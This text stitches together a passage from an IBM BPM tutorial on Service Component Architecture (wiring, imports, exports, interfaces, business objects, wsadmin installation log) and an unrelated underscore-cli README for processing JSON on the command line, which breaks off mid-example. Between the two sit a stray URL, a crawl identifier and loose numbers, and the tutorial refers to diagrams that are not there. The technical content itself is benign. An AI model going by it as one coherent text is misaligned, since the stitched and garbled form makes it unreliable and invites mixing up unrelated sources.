see a BPEL process. Now we get to take the next leap. Imagine that we have create a number of component on our Assembly Diagram where each component has a discrete and self contained purpose. This is not yet a solution … what we would have created would be a set of building blocks that we could construct our solution from. To build the solution we would need to connect the building blocks together to perform a bigger task. For example, if we had a component that charges a credit card and we had a component that receives a customer order, we may wish for the order processing to invoke the services of the credit card charging. To describe this to SCA, we can draw wires from one component to another. This is illustrated in the next diagram: It is important to understand that at the SCA layer, we are not describing flow control. Instead what we are saying here is that the component called CustomerOrder can (if it chooses) call another component called ChargeCreditCard. We are not saying that it will, must or does … simply that if it wants to, it can. Going further, the CustomerOrder component may invoke a service (another component) that ships product to a customer. The assembly for this may look like: SCA Interfaces and References Every SCA component is capable of being invoked (called) by another. This means that the component has to be able to describe what it is capable of doing and what it expects as input should it be called. Consider a component that charges a credit card. What does it expect as input? These inputs are not prescribed by the caller, they are prescribed by the implementation of credit card processing function or service. An example of input might be: These parameters are not negotiable. In order to use the cried card service, they must be provided. This can be thought of as a contract between the credit card service provider and anyone who may want to call it. Another analogy may also help to make this concrete. In the Java programming language there is a concept called a Java Interface. The Java Interface describes the methods and parameters of those methods as well as the return types. The Java Interface does not describe how the methods are implemented … that is up to the Java programmer to decide. The Java Interface does however describe the relationship between a calling Java Class and an implementation of a class that conforms to the Interface. This latter example is close to what we find in SCA. Every component in SCA exposes an Interface that describes the operations that can be requested of it. Each operation describes its expected input parameters and the nature of the parameters returned. It needs to be quickly states that the Interface is not described as Java … that would be too low level. Instead the interface is described in a (arguably) complex language called WSDL (Web Services Description Language). However … IBPM ID hides the WSDL from you and exposes a full function interface description editor that removes all the complexity. Let us review what we know so far. When we want to create an SCA component, we will build an interface that abstractly describes the contract that the component will expose which will include one or more operations. Each operation will have one or more input parameters and return zero or more output parameters. When we create an SCA component, we define the type of component that it is (eg. Java, BPEL, Mediation) and we associate an interface with that component. When we finally get around to implementing the component, both the type and the interface associated with it will govern the nature of the implementation. In the Assembly Diagram, the purple circle on the left with the capital letter "I" contained within is used to represent the interface possessed by the component. If we hover the mouse over the interface a pop-up appears showing us the name of the interface implemented by the component. The interface that a component provides is like a socket and a reference that connects into that component is like a plug. If we sit and think about this for a while, an elegant and important concept comes to mind. Since one component provides an interface and another component that wishes to call the first provides a reference, unless both components agree on the same description of the interface it is impossible for the two components to be wired together accidentally. SCA enforces this desirable policing. To wire two components together, the Assembly Diagram Editor allows us to draw a visual link between the two components. This clearly illustrates to us the relationship between them. There is one further idea here that I want to bring to the surface. When a component wishes to invoke another component, the calling component sends the request not to the other component directly, but instead passes the request to its own local reference. At this point, SCA kicks in and the Assembly Diagram is consulted. Whatever a components reference is wired to is where the request will be sent. This means that the calling component is loosely coupled to the component that provides the service. At any time, the developer can rewire the relationship between a service caller and a service provider to point to a different service (with the same interface) and this will be honored. Another way of saying this is that calling SCA component has no idea at development time who, what or where the request will be delivered to. All it sees is the contract advertised through the interface. This is SOA in its ultimate form. The SCA Import Component So far we have touched upon one SCA component calling another where both components are hosted inside the SCA framework. In practice, this is rarely sufficient. Most solutions involve services that are hosted outside of a single SCA environment. For example, there may be a service that processes credit card billing that is exposed as a Web Service somewhere else in your organization. You may want to perform a ZIP code lookup which is owned by an external agency. The service you are calling may be hosted by CICS on a mainframe or accessed via WebSphere MQ. Simply calling from one SCA component to another inside the SCA environment is not sufficient. Fortunately, SCA comes to our aid yet again with an additional concept called the SCA Import. The SCA Import can be thought of as a proxy for communicating with a service that exists outside of our local environment. On the Assembly Diagram, it looks as follows: Notice its distinctive icon. Just like other SCA component, the SCA Import exposes an interface definition. This means that it can be wired as another component's SCA reference. Unlike other components, the SCA Import does not have a native implementation. Instead, when it is called, it is responsible for building a network request in a specific format and protocol and transmitting that request to the external system. When a developer adds an SCA Import to the diagram they are also responsible for binding that component to an external system. Putting it another way, the act of binding performs the following: There is much more to be said about the SCA Import component. Each of the different protocol types has its own story and parameters and these will be described later but for now it is sufficient to understand that the SCA Import is a proxy to a real external service. Once again we see that through the loose binding of SCA wiring with its interfaces and references, the caller has no idea that the request is going external. When the caller sends its request, that request surfaces at the reference and depending on how the developer has wired the diagram, the request will flow to the target component. If that component happens to be an SCA Import, then the configuration of the SCA Import will be honored and the request transmitted externally to the target. If at some later date, the target changes location or other nature, the SCA Import need only be reconfigured and all will be well. The business logic of the caller need have no knowledge of changes to the target. Again, a perfect "separation of concerns". The choice of name for the proxy has always caused confusion. Why is it called "Import"? The relatively simple answer is that we are importing the services of an external provider. More on this naming later after we speak about SCA Exports. The SCA Export Component There is one further SCA component that we must address before we go too much further. This component is called the SCA Export. From a diagraming perspective, it looks as follows: Again, note its distinctive icon. The purpose of the SCA Export is to expose an entry point into a module so that an external caller can invoke the logic contained in the module. We have already seen that an SCA assembly can be used to wire together various pieces of function to achieve a business goal but we have skipped the idea of how the components contained within the diagram are initially started. Components contained in an SCA Assembly Diagram are not exposed to be called directly from outside the diagram. What happens inside the SCA diagram is private (from the callers). To allow external access, we insert an SCA Export component. Just like other components, it has an interface associated with it. It is this interface that is exposed to the outside world. In addition to having an interface, the SCA Export always has a reference attached to it which is of exactly the same type as its exposed interface. This reference can then be wired to other down-stream SCA Components. Similar to the SCA Import, the SCA Export acts as a proxy. When it is configured by the developer, it declares a communications protocol (Web Services, MQ, SOAP etc) that it is willing to listen upon. When the module containing the diagram is deployed for execution, the module is examined looking for export components. For each one found, the runtime automatically starts listening for incoming requests. When a request is received, a new instance of the module is started and control is given to the component to which the export is wired. Once again we see loose coupling at work. An SCA component has no idea who has called it, only that it has been called. This means that the export component hides from other SCA components the details of how a request was received. A diagram can have multiple SCA Exports. Each different export could be bound to a different protocol allowing the business function as a whole to be exposed through a variety of technologies. SCA Interfaces When we started the discussion of SCA we quickly found that components have interfaces and may have references. Both of these are described using Interface descriptions. It was also mentioned that the interface descriptions are themselves WSDL files under the covers. Now it is time to look at how an interface is described to SCA. In a module, each interface defined is a named entity. When created or opened, the interface has its own editor called the Interface Editor. When we create a new Interface from scratch, a wizard page is displayed to us that looks as follows: Within this page, we can enter the name that we wish to give the interface. This name combined with its namespace must be unique. Once a new interface has been created or an existing interface opened, the Interface Editor is shown. The editor shows two primary sections. One is an Interface section that shows the nature of the interface as a whole while the second section shows the operations exposed by that interface. Each operation is a possible entry point into the component described by the interface. When initially created, the interface has no operations defined to it. We can add operations by clicking on the add operation buttons: When an operation is defined, the properties for the operation can be changed. These include: Once the operations have been defined and any changes made, the interface may be saved. Saving an interface results in the actual WSDL file that the interface represents being written. Again, under the covers the interface is described in the deeply technical WSDL language but yet we need never look at the interface from that perspective. In the vast majority of cases, we need only ever work with the Interface through the logical perspective as shown through the Interface Editor. Only the runtime execution cares that an interface is actually a mechanical WSDL file. When we add a new SCA component onto the Assembly Diagram canvas, it has no interface or references associated with it. If we hover the mouse over the component, a pop-up appears from which we can add and select the interfaces we wish: SCA Business Objects When we looked at SCA Interfaces, we say that each operation in the interface may have multiple input and output parameters and that each parameter has a data type associated with it. The list of data types available include the usual suspects including strings, integers, floating points, dates, times etc. However, it is extremely common to want to create our own complex data types. These complex data types are collections of named fields which themselves have their own data types. For example, a customer will commonly have an address. We could create parameters on our interface for each of the expected items such as street, city, state and zip code but this is not as convenient as creating a single parameter that represents an address as a whole. In SCA, these complex and structured data types are called Business Objects. Within the ID tooling, we can create our own named Business Objects and give them fields with names and data types that we desire. Under the covers, the Business Object is physically represented by an XML Schema Definition file but, just like with interfaces and WSDL, ID provides an elegant editor to hide this technical detail from us. The end result is an editor called the Business Object editor that provides all the capabilities we desire while at the same time hiding from us deeply technical constructs that in the majority of times, we have no use for. Similar to Interfaces, Business Objects are first class entities and exist in the Data Types folder. When a Business Object is created, a wizard allows us to enter its key characteristics. Core amongst these are the name of the Business Object (BO). When the wizard completes for a new BO or if an existing BO is opened, the BO Editor is shown: The BO editor shows a container (the BO type) into which the fields of the BO may be defined. Each field added can be given its own name and data type. Fields can themselves be typed for other BOs and can also be typed as arrays of data. Once a data type is defined, that data type can be used within an SCA Interface definition: One of the primary purposes of SCA having Business Objects is to provide a normalized format of data passing between components. In addition, when raw physical data is received at an SCA Export, that data is parsed and a corresponding Business Object is constructed and passed forwards. This insulates other SCA components from having to concern themselves from the physical format of data sent by a service requestor. Conversely, when an SCA Import call is made and a parameter is a Business Object, the Business Object's data is serialized into a suitable physical format for outbound transmission. The Business Object's normalization of data moving around inside the SCA world make all of this possible. SCA Event Sequencing The idea of event sequencing is to ensure that requests that arrive in a given order are processed in that order but only when this would make a difference. If it doesn't matter what order the requests are processed in, they can be executed in parallel. Consider for example two requests that arrive in order. The first request creates a bank account and the second request deposits $100 in that account. If these two requests are attempted to be executed in parallel, it is conceivable that the action to add $100 may take place before the creation of the bank account has completed. Next consider a debit of $50 from one account and a credit of $75 to a different account. Since these accounts are different and there is no relationship between the requests, the activities can happily execute in parallel. SCA Event Sequencing can be used to examine the data in an incoming request and, based on the content of that data determine if the request should be held until previous requests have completed or whether the request is eligible for immediate start. Event Sequencing is enabled at the SCA diagram level. By selecting an interface on a component and then selecting an operation, we can add a quality of service and one of the options is Event Sequencing. Once an Event sequencing quality of service has been added, we can then define the properties for this attribute: Here we define the parameters used as input of the service and the XPath expression to the field or fields that are to be used for sequencing. The underlying implementation of Event sequencing is based on a number of WAS supplied applications and resources. Specifically: See also: SCA Store and Forward See also: SCA Versions SCA was an invention of IBM and some of her competitors. It was designed to provide interoperability between a variety of SOA players. SCA has become an industry standard and has undergone a variety of iterations. IBM's WebSphere Application Server provides an implementation of SCA as part of the base product, however, this is not the same SCA as is currently found in IBPM. See Also: Installing an SCA Module through scripting After having built an SCA module, we can export it as an EAR file for deployment. The deployment of the EAR can be accomplished through wsadmin style scripting. The command called " AdminApp" can be used to work with EAR applications. Full details of using this command can be found in the WAS InfoCenter. AdminApp.install('<Path to EAR>') An example of the output of the installation looks like: wsadmin>AdminApp.install('C:/temp/SCAInstall.ear') ADMA5016I: Installation of SCAInstallApp started. CWLIN1002I: Creating the WebSphere business integration context CWLIN1000I: Extracting the .ear file to a temporary location CWLIN1007I: Initializing the WebSphere business integration context CWLIN1005I: Performing WebSphere business integration precompilation tasks CWLIN1001I: Compiling generated artifacts CWLIN1006I: Performing WebSphere business integration postcompilation tasks CWLIN1004I: Creating an .ear file from the temporary location CWLIN1008I: Cleaning the WebSphere business integration context ADMA5058I: Application and module versions are validated with versions of deployment targets. ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository. CWWBF0028I: Process components of SCAInstallApp have been successfully configured in the WebSphere configuration repository. ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository. ADMA5081I: The bootstrap address for client module is configured in the WebSphere Application Server repository. ADMA5053I: The library references for the installed optional package are created. ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository. ADMA5001I: The application binaries are saved in C:\IBM\WebSphere\AppServer\profiles\ProcCtr01\wstemp\Script13b19bdc42d\workspace\cells\win7-x64Node01Cell\applications\SCAInstallApp.ear\SCAInstallApp.ear ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository. SECJ0400I: Successfully updated the application SCAInstallApp with the appContextIDForSecurity information. ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository. ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository. CWSCA3013I: Resources for the SCA application "SCAInstallApp" are being configured. CWSCA3023I: The EAR file "SCAInstallApp.ear" is being loaded for the SCA module. CWSCA3017I: Installation task "SCAModuleTask" is running. CWSCA3017I: Installation task "Resource Task for SCA Messaging Binding and EIS Binding" is running. CWSCA3017I: Installation task "Resource Task for SCA Messaging Binding and JMS Binding" is running. CWSCA3017I: Installation task "SIBus Destination Resource Task for SCA Asynchronous Invocations" is running. CWSCA3017I: Installation task "EJB NamespaceBinding Resource Task for SCAImportBinding" is running. CWSCA3017I: Installation task "SIBus Destination Resource Task for SCA SOAP/JMSInvocations" is running. CWSCA3017I: Installation task "Deployment Task for JaxWsImportBinding and JaxWsExportBinding" is running. CWSCA3014I: Resources for the SCA application "SCAInstallApp" have been configured successfully. ADMA5113I: Activation plan created successfully. ADMA5011I: The cleanup of the temp directory for application SCAInstallApp is complete. ADMA5013I: Application SCAInstallApp installed successfully. '' After making changes through this command, remember to call: AdminConfig.save() to save the configuration changes. Once installed, the application can be seen from the WAS admin console. Applications installed through scripting are initially in the stopped state: SCA Tracing There are times where we want to know what SCA is doing behind the scenes and one way to achieve that is to switch on tracing. To switch on WAS level tracing, we need to know which WAS trace flags we wish to enable. SCA Cross Component Tracing When we think of an SCA module, we should realize that it can span many processes and threads. As such, log information from it may be scattered throughout a log file over time and with multiple identifiers. Obviously, this can make examination of such data quite difficult. IBM has overcome this problem with a concept called "Cross Component Tracing". The high level idea behind this is that we can enable Cross Component Tracing (called XCT) on a per SCA application basis. When that application then runs, efficient log information is then written either to trace or the System Console which contains enough information for the flow through an SCA module to be visualized. Here is an example of cross component trace for a given SCA module. We can see the entry and exit from each of the components in the assembly including their start and end times. From an instrumentation standpoint, there is nothing new that need be injected into the SCA module to enable this. This makes it available to be "switched on" in a production environment without the need for any kind of new application deployment (which might not be allowed in such a production environment).
https://learn.salientprocess.com/books/ibm-bpm/page/service-component-architecture
CC-MAIN-2019-22
refinedweb
5,059
53.61
C# - The C# Memory Model in Theory and Practice By Igor Ostrovsky | December 2012 This is the first of a two-part series that will tell the long story of the C# memory model. The first part explains the guarantees. Consider the following method: If _data and _initialized are ordinary (that is, non-volatile) fields, the compiler and the processor are allowed to reorder the operations so that Init executes as if it were written like this: There are various optimizations in both compilers and processors that can result in this kind of reordering, as I’ll discuss in Part 2. In a single-threaded program, the reordering of statements in Init makes no difference in the meaning of the program. As long as both _initialized and _data are updated before the method returns, the order of the assignments doesn’t matter. In a single-threaded program, there’s no second thread that could observe the state in between the updates. In a multithreaded program, however, the order of the assignments may matter because another thread might read the fields while Init is in the middle of execution. Consequently, in the reordered version of Init, another thread may observe _initialized=true and _data=0. The C# memory model is a set of rules that describes what kinds of memory-operation reordering are and are not allowed. All programs should be written against the guarantees defined in the specification. However, even if the compiler and the processor are allowed to reorder memory operations, it doesn’t mean they always do so in practice. Many programs that contain a “bug” according to the abstract C# memory model will still execute correctly on particular hardware running a particular version of the .NET Framework. Notably, the x86 and x64 processors reorder operations only in certain narrow scenarios, and similarly the CLR just-in-time (JIT) compiler doesn’t perform many of the transformations it’s allowed to. Although the abstract C# memory model is what you should have in mind when writing new code, it can be helpful to understand the actual implementation of the memory model on different architectures, in particular when trying to understand the behavior of existing code. C# Memory Model According to ECMA-334 The authoritative definition of the C# memory model is in the Standard ECMA-334 C# Language Specification (bit.ly/MXMCrN). Let’s discuss the C# memory model as defined in the specification. Memory Operation Reordering According to ECMA-334, when a thread reads a memory location in C# that was written to by a different thread, the reader might see a stale value. This problem is illustrated in Figure 1. Suppose Init and Print are called in parallel (that is, on different threads) on a new instance of DataInit. If you examine the code of Init and Print, it may seem that Print can only output “42” or “Not initialized.” However, Print can also output “0.” The C# memory model permits reordering of memory operations in a method, as long as the behavior of single-threaded execution doesn’t change. For example, the compiler and the processor are free to reorder the Init method operations as follows: This reordering wouldn’t change the behavior of the Init method in a single-threaded program. In a multithreaded program, however, another thread might read _initialized and _data fields after Init has modified one field but not the other, and then the reordering could change the behavior of the program. As a result, the Print method could end up outputting a “0.” The reordering of Init isn’t the only possible source of trouble in this code sample. Even if the Init writes don’t end up reordered, the reads in the Print method could be transformed: Just as with the reordering of writes, this transformation has no effect in a single-threaded program, but might change the behavior of a multithreaded program. And, just like the reordering of writes, the reordering of reads can also result in a 0 printed to the output. In Part 2 of this article, you’ll see how and why these transformations take place in practice when I look at different hardware architectures in detail.. Consider this example: Read 1 and Read 3 are non-volatile, while Read 2 is volatile. Read 2 can’t be reordered with Read 3, but it can be reordered with Read 1. Figure 2 shows the valid reorderings of the Foo body. Figure 2 Valid Reordering of Reads in AcquireSemanticsExample A write of a volatile field, on the other hand, has release semantics, and so it can’t be reordered with prior operations. A volatile write forms a one-way fence, as this example demonstrates: Write 1 and Write 3 are non-volatile, while Write 2 is volatile. Write 2 can’t be reordered with Write 1, but it can be reordered with Write 3. Figure 3 shows the valid reorderings of the Foo body. Figure 3 Valid Reordering of Writes in ReleaseSemanticsExample I’ll come back to the acquire-release semantics in the “Publication via Volatile Field” section later in this article. Atomicity Another issue to be aware of is that in C#, values aren’t necessarily written atomically into memory. Consider this example: If one thread repeatedly calls SetValue and another thread calls GetValue, the getter thread might observe a value that was never written by the setter thread. For example, if the setter thread alternately calls SetValue with Guid values (0,0,0,0) and (5,5,5,5), GetValue could observe (0,0,0,5) or (0,0,5,5) or (5,5,0,0), even though none of those values was ever assigned using SetValue. The reason behind the “tearing” is that the assignment “_value = value” doesn’t execute atomically at the hardware level. Similarly, the read of _value also doesn’t execute atomically. The C# ECMA specification guarantees that the following types will be written atomically: reference types, bool, char, byte, sbyte, short, ushort, uint, int and float. Values of other types—including user-defined value types—could be written into memory in multiple atomic writes. As a result, a reading thread could observe a torn value consisting of pieces of different values. One caveat is that even the types that are normally read and written atomically (such as int) could be read or written non-atomically if the value is not correctly aligned in memory. Normally, C# will ensure that values are correctly aligned, but the user is able to override the alignment using the StructLayoutAttribute class (bit.ly/Tqa0MZ).. Because the ECMA C# spec doesn’t rule out the non-reordering optimizations, they’re presumably allowed. In fact, as I’ll discuss in Part 2, the JIT compiler does perform these types of optimizations. Thread Communication Patterns The purpose of a memory model is to enable thread communication. When one thread writes values to memory and another thread reads from memory, the memory model dictates what values the reading thread might see. Locking Locking is typically the easiest way to share data among threads. If you use locks correctly, you basically don’t have to worry about any of the memory model messiness. Whenever a thread acquires a lock, the CLR ensures that the thread will see all updates made by the thread that held the lock earlier. Let’s add locking to the example from the beginning of this article, as shown in Figure 4. Adding a lock that Print and Set acquire provides a simple solution. Now, Set and Print execute atomically with respect to each other. The lock statement guarantees that the bodies of Print and Set will appear to execute in some sequential order, even if they’re called from multiple threads. The diagram in Figure 5 shows one possible sequential order that could happen if Thread 1 calls Print three times, Thread 2 calls Set once and Thread 3 calls Print once. Figure 5 Sequential Execution with Locking When a locked block of code executes, it’s guaranteed to see all writes from blocks that precede the block in the sequential order of the lock. Also, it’s guaranteed not to see any of the writes from blocks that follow it in the sequential order of the lock. In short, locks hide all of the unpredictability and complexity weirdness of the memory model: You don’t have to worry about the reordering of memory operations if you use locks correctly. However, note that the use of locking has to be correct. If only Print or Set uses the lock—or Print and Set acquire two different locks—memory operations can become reordered and the complexity of the memory model comes back. Publication via Threading API Locking is a very general and powerful mechanism for sharing state among threads. Publication via threading API is another frequently used pattern of concurrent programming. The easiest way to illustrate publication via threading API is by way of an example: When you examine the preceding code sample, you’d probably expect “42” to be printed to the screen. And, in fact, your intuition would be correct. This code sample is guaranteed to print “42.” It might be surprising that this case even needs to be mentioned, but in fact there are possible implementations of StartNew that would allow “0” to be printed instead of “42,” at least in theory. After all, there are two threads communicating via a non-volatile field, so memory operations can be reordered. The pattern is displayed in the diagram in Figure 6. Figure 6 Two Threads Communicating via a Non-Volatile Field The StartNew implementation must ensure that the write to s_value on Thread 1 will not move after <start task t>, and the read from s_value on Thread 2 will not move before <task t starting>. And, in fact, the StartNew API really does guarantee this. All other threading APIs in the .NET Framework, such as Thread.Start and ThreadPool.QueueUserWorkItem, also make a similar guarantee. In fact, nearly every threading API must have some barrier semantics in order to function correctly. These are almost never documented, but can usually be deduced simply by thinking about what the guarantees would have to be in order for the API to be useful. Publication via Type Initialization Another way to safely publish a value to multiple threads is to write the value to a static field in a static initializer or a static constructor. Consider this example: If Test3.PrintValue is called from multiple threads concurrently, is it guaranteed that each PrintValue call will print “42” and “false”? Or, could one of the calls also print “0” or “true”? Just as in the previous case, you do get the behavior you’d expect: Each thread is guaranteed to print “42” and “false.” The patterns discussed so far all behave as you’d expect. Now I’ll get to cases whose behavior may be surprising. Publication via Volatile Field Many concurrent programs can be built using the three simple patterns discussed so far, used together with concurrency primitives in the .NET System.Threading and System.Collections.Concurrent namespaces. The pattern I’m about to discuss is so important that the semantics of the volatile keyword were designed around it. In fact, the best way to remember the volatile keyword semantics is to remember this pattern, instead of trying to memorize the abstract rules explained earlier in this article. Let’s start with the example code in Figure 7. The DataInit class in Figure 7 has two methods, Init and Print; both may be called from multiple threads. If no memory operations are reordered, Print can only print “Not initialized” or “42,” but there are two possible cases when Print could print a “0”: - Write 1 and Write 2 were reordered. - Read 1 and Read 2 were reordered. public class DataInit { private int _data = 0; private volatile bool _initialized = false; void Init() { _data = 42; // Write 1 _initialized = true; // Write 2 } void Print() { if (_initialized) { // Read 1 Console.WriteLine(_data); // Read 2 } else { Console.WriteLine("Not initialized"); } } } If _initialized were not marked as volatile, both reorderings would be permitted. However, when _initialized is marked as volatile, neither reordering is allowed! In the case of writes, you have an ordinary write followed by a volatile write, and a volatile write can’t be reordered with a prior memory operation. In the case of the reads, you have a volatile read followed by an ordinary read, and a volatile read can’t be reordered with a subsequent memory operation. So, Print will never print “0,” even if called concurrently with Init on a new instance of DataInit. Note that if the _data field is volatile but _initialized is not, both reorderings would be permitted. As a result, remembering this example is a good way to remember the volatile semantics. Lazy Initialization One common variant of publication via volatile field is lazy initialization. The example in Figure 8 illustrates lazy initialization. In this example, LazyGet is always guaranteed to return “42.” However, if the _box field were not volatile, LazyGet would be allowed to return “0” for two reasons: the reads could get reordered, or the writes could get reordered. To further emphasize the point, consider this class: Now, it’s possible—at least in theory—that PrintValue will print “0” due to a memory-model issue. Here’s a usage example of BoxedInt that allows it: Because the BoxedInt instance was incorrectly published (through a non-volatile field, _box), the thread that calls Print may observe a partially constructed object! Again, making the _box field volatile would fix the issue. Interlocked Operations and Memory Barriers Interlocked operations are atomic operations that can be used at times to reduce locking in a multithreaded program. Consider this simple thread-safe counter class: Using Interlocked.Increment, you can rewrite the program like this: As rewritten with Interlocked.Increment, the method should execute faster, at least on some architectures. In addition to the increment operations, the Interlocked class (bit.ly/RksCMF) exposes methods for various atomic operations: adding a value, conditionally replacing a value, replacing a value and returning the original value, and so forth. All Interlocked methods have one very interesting property: They can’t be reordered with other memory operations. So no memory operation, whether before or after an Interlocked operation, can pass an Interlocked operation. An operation that’s closely related to Interlocked methods is Thread.MemoryBarrier, which can be thought of as a dummy Interlocked operation. Just like an Interlocked method, Thread.MemoryBarrier can’t be reordered with any prior or subsequent memory operations. Unlike an Interlocked method, though, Thread.MemoryBarrier has no side effect; it simply constrains memory reorderings. Polling Loop Polling loop is a pattern that’s generally not recommended but—somewhat unfortunately—frequently used in practice. Figure 9 shows a broken polling loop. class PollingLoopExample { private bool _loop = true; public static void Main() { PollingLoopExample test1 = new PollingLoopExample(); // Set _loop to false on another thread new Thread(() => { test1._loop = false;}).Start(); // Poll the _loop field until it is set to false while (test1._loop) ; // The previous loop may never terminate } } In this example, the main thread loops, polling a particular non-volatile field. A helper thread sets the field in the meantime, but the main thread may never see the updated value. Now, what if the _loop field was marked volatile? Would that fix the program? The general expert consensus seems to be that the compiler isn’t allowed to hoist a volatile field read out of a loop, but it’s debatable whether the ECMA C# specification makes this guarantee. On one hand, the specification states only that volatile fields obey the acquire-release semantics, which doesn’t seem sufficient to prevent hoisting of a volatile field. On the other hand, the example code in the specification does in fact poll a volatile field, implying that the volatile field read can’t be hoisted out of the loop. On x86 and x64 architectures, PollingLoopExample.Main will typically hang. The JIT compiler will read test1._loop field just once, save the value in a register, and then loop until the register value changes, which will obviously never happen. If the loop body contains some statements, however, the JIT compiler will probably need the register for some other purpose, so each iteration may end up rereading test1._loop. As a result, you may end up seeing loops in existing programs that poll a non-volatile field and yet happen to work. Concurrency Primitives Much concurrent code can benefit from high-level concurrency primitives that became available in the .NET Framework 4. Figure 10 lists some of the .NET concurrency primitives. Figure 10 Concurrency Primitives in the .NET Framework 4 By using these primitives, you can often avoid low-level code that depends on the memory model in intricate ways (via volatile and the like). Coming Up So far, I’ve described the C# memory model as defined in the ECMA C# specification, and discussed the most important patterns of thread communication that define the memory model. The second part of this article will explain how the memory model is actually implemented on different architectures, which is helpful for understanding the behavior of programs in the real world. Best Practices - All code you write should rely only on the guarantees made by the ECMA C# specification, and not on any of the implementation details explained in this article. - Avoid unnecessary use of volatile fields. Most of the time, locks or concurrent collections (System.Collections.Concurrent.*) are more appropriate for exchanging data between threads. In some cases, volatile fields can be used to optimize concurrent code, but you should use performance measurements to validate that the benefit outweighs the extra complexity. - Instead of implementing the lazy initialization pattern yourself using a volatile field, use the System.Lazy<T> and System.Threading.LazyInitializer types. - Avoid polling loops. Often, you can use a BlockingCollection<T>, Monitor.Wait/Pulse, events or asynchronous programming instead of a polling loop. - Whenever possible, use the standard .NET concurrency primitives instead of implementing equivalent functionality yourself. Igor Ostrovsky is a senior software development engineer at Microsoft. He has worked on Parallel LINQ, the Task Parallel Library, and other parallel libraries and primitives in the Microsoft .NET Framework. Ostrovsky blogs about programming topics at igoro.com. Thanks to the following technical expert for reviewing this article: Joe Duffy, Eric Eilebrecht, Joe Hoag, Emad Omara, Grant Richins, Jaroslav Sevcik and Stephen Toub Receive the MSDN Flash e-mail newsletter every other week, with news and information personalized to your interests and areas of focus.
https://msdn.microsoft.com/en-us/magazine/jj863136.aspx
CC-MAIN-2019-09
refinedweb
3,114
53.31
Command-line interface to underscore.js - useful for shell scripting and JSON processing JSON is an excellent data interchange format and rapidly becoming the preferred format for Web APIs. Thusfar, most of the tools to process it are very limited. Yet, when working in Javascript, JSON is fluid and natural. Why can't command-line Javascript be easy? Underscore-CLI can be a simple pretty printer: cat data.json | underscore print --color Or it can form the backbone of a rich, full-powered Javascript command-line, inspired by "perl -pe", and doing for structured data what sed, awk, and grep do for text. cat example-data/earthporn.json | underscore extract 'data.children' | underscore pluck data | underscore pluck title See [Real World Example] (#real_world_example) for the output and more examples. Underscore-CLI is built on Node.js, which is less than a 4M download and very easy to install. Node.js is rapidly gaining mindshare as a tool for writing scalable services in Javascript. Unfortutately, out-of-the-box, Node.js is a pretty horrible as a command-line tool. This is what it takes to simply echo stdin: cat foo.json | node -e ' var data = ""; process.stdin.setEncoding("utf8"); process.stdin.on("data", function (d) { data = data + d; }); process.stdin.on("end", function () { // put all your code here console.log(data); }); process.stdin.resume(); ' Ugly. Underscore-CLI handles all the verbose boilerplate, making it easy to do simple data manipulations: echo '[1, 2, 3, 4]' | underscore process 'map(data, function (value) { return value+1 })' If you are used to seeing "_.map", note that because we arn't worried about keeping the global namespace clean, many useful functions (including all of underscore.js) are exposed as globals. Of course 'mapping' a function to a dataset is super common, so as a shortcut, it's exposed as a first-class command, and the expression you provide is auto-wrapped in "function (value, key, list) { return ... }". echo '[1, 2, 3, 4]' | underscore map 'value+1' Also, while you can pipe data in, if the data is just a string like the example above, there's a shortcut for that too: underscore -d '[1, 2, 3, 4]' map 'value+1' Or if it's stored in a file, and you want to write the output to another file: underscore -i data.json map 'value+1' -o output.json Here's what it takes to increment the minor version number for an NPM package (straight from our Makefile): underscore -i package.json process 'vv=data.version.split("."),vv[2]++,data.version=vv.join("."),data' -o package.json Installing Node is easy. It's only a 4M download: Alternatively, if you do homebrew, you can: brew install node For more details on what node is, see this StackOverflow thread npm install -g underscore-cli underscore help If you run the tool without any arguments, this is what prints out: Usage: underscore <command> [--in <filename>|--data <JSON>|--nodata] [--infmt <format>] [--out <filename>] [--outfmt <format>] [--quiet] [--strict] [--color] [--text] [--trace] [--coffee] [--js] Commands: help [command] Print more detailed help and examples for a specific command type Print the type of the input data: {object, array, number, string, boolean, null, undefined} print Output the data without any transformations. Can be used to pretty-print JSON data. pretty Output the data without any transformations. Can be used to pretty-print JSON data. (defaults output format to 'pretty') run <exp> Runs arbitrary JS code. Use for CLI Javascripting. process <exp> Run arbitrary JS against the input data. Expression Args: (data) extract <field> Extract a field from the input data. Also supports field1.field2.field3 map <exp> Map each value from a list/object through a transformation expression whose arguments are (value, key, list).' reduce <exp> Boil a list down to a single value by successively combining each element with a running total. Expression args: (total, value, key, list) reduceRight <exp> Right-associative version of reduce. ie, 1 + (2 + (3 + 4)). Expression args: (total, value, key, list) select <jselexp> Run a 'JSON Selector' query against the input data. See jsonselect.org. find <exp> Return the first value for which the expression Return a truish value. Expression args: (value, key, list) filter <exp> Return an array of all values that make the expression true. Expression args: (value, key, list) reject <exp> Return an array of all values that make the expression false. Expression args: (value, key, list) flatten Flattens a nested array (the nesting can be to any depth). If you pass '--shallow', the array will only be flattened a single level. pluck <key> Extract a single property from a list of objects keys Retrieve all the names of an object's properties. values Retrieve all the values of an object's properties. extend <object> Override properties in the input data. defaults <object> Fill in missing properties in the input data. any <exp> Return 'true' if any of the values in the input make the expression true. Expression args: (value, key, list) all <exp> Return 'true' if all values in the input make the expression true. Expression args: (value, key, list) isObject Return 'true' if the input data is an object with named properties isArray Return 'true' if the input data is an array isString Return 'true' if the input data is a string isNumber Return 'true' if the input data is a number isBoolean Return 'true' if the input data is a boolean, ie {true, false} isNull Return 'true' if the input data is the 'null' value isUndefined Return 'true' if the input data is undefined template <filename> Process an underscore template and print the results. See 'help template' Options: -h, --help output usage information -V, --version output the version number -i, --in <filename> The data file to load. If not specified, defaults to stdin. --infmt <format> The format of the input data. See 'help formats' -o, --out <filename> The output file. If not specified, defaults to stdout. --outfmt <format> The format of the output data. See 'help formats' -d, --data <JSON> Input data provided in lieu of a filename -n, --nodata Input data is 'undefined' -q, --quiet Suppress normal output. 'console.log' will still trigger output. --strict Use strict JSON parsing instead of more lax 'eval' syntax. To avoid security concerns, use this with ANY data from an external source. --color Colorize output --text Parse data as text instead of JSON. Sets input and output formats to 'text' --trace Print stack traces when things go wrong --coffee Interpret expression as CoffeeScript. See --js Interpret expression as JavaScript. (default is "auto") Examples: underscore map --data '[1, 2, 3, 4]' 'value+1' # [2, 